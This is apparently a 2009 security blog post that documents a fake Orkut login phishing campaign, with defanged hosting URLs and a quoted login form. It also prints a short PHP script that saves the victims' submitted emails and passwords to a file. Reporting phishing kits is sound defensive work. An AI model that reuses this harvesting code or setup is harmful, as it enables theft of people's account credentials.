Sunday, May 31, 2009

Comes Again………………

This is with compromised Orkut account , the fake orkut login link are updated as links go down periodically

Here is the new link

hxxp://wwworkutnewscrapcom.tk

this has the iframe to

hxxp://scrap222.kilu.de/index.html

this where the fake page is hosted

Here is the source that executes a php to post the user name and password.

   1: <form id="gaia_loginform" action="run.php" method="get"



   2:         onsubmit="return(gaia_onLoginSubmit());">




php  is similar to following script





   1: <?php /* Created on: 3/27/2007 */ 



   2: $fp = fopen("OrkutPasswords.htm", "a");



   3: fwrite($fp, "Email:$_POST[Email]\tPassword:$_POST[Passwd]");



   4: echo "<HTML>



   5: <head>



   6: <title>Welcome to Hack-Genius</title>



   7: <FRAMESET cols=\"*\">



   8:   <FRAME SRC=\"http://www.hack-genius.blogspot.com\">



   9: </FRAMESET>";?>



this kinda of Fake Orkut is easily downloaded from torrent

Currently is been removed from the torrent site , its good for now.

No comments:

APK spam on Whatsapp Targeting Bank users

  Initial vector:   Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....